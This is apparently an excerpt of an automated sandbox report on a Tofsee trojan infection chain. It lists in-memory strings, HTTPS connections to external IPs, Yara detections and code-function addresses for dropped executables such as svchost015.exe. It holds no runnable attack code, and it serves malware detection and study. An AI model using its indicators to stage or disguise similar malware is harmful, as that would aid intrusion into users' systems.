                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plugins/#SkinNotifier
                    Source: svchost015.exe, 00000001.00000003.1706588776.0000000003CFE000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plugins/#SkinNotifier5.0You
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plus-pack/
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plus-pack/m03m04
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/pro/
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/pro/m02
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeperm01
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/webmailsub
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.comhttps://www.esumsoft.com/donation/Updater.exeUpdaterPPtweakerPPTweakerSentMa
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.comm00
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/tokenhttps://login.microsoftonline.com/common/oauth2/v2.0/token
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.39.17.76:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.53.21:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: Yara match | File source: 1.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nK8noQeiXl.exe PID: 8572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost015.exe PID: 8648, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
Source: Yara match | File source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR

                    System Summary

                    barindex
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPE, Matched rule: Detects Tofsee, Author: ditekSHen
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPE, Matched rule: Detects Tofsee, Author: ditekSHen
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Tofsee, Author: ditekSHen
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Tofsee, Author: ditekSHen
                    Source: 0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0042F530 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00423B94 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004125E8 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004789DC NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0042E944 CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                    Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 10_2_02771280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe, Code function: 3_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, Code function: 0_2_04F5254C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, Code function: 0_2_04F522E0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe, Code function: 0_2_04F56D00
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Code function: 1_2_1000E965
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Code function: 1_2_10010A80
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe, Code function: 3_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004804C6
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00470950
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004352D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00467710
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0043036C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004444D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004345D4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00486604
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00444A80
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00430EF8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00445178
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0045F430
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0045B4D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00487564
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00445584
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_00469770
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0048D8C4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_004519A8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp, Code function: 4_2_0043DD60
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_00401000
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_004067B7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_609660FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6092114F
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6096923E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6093323D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6095C314
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60950312
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6093B368
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6096748C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60954470
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_609615FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_609606A8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60932654
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60955665
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60964807
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60937929
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60936B27
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60954CF6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60963D35
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60951E86
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_60954FF8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D9BAFD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02DA2A80
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D9D32F
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D970C0
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D8E089
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02DA267D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe, Code function: 5_2_02D9B609
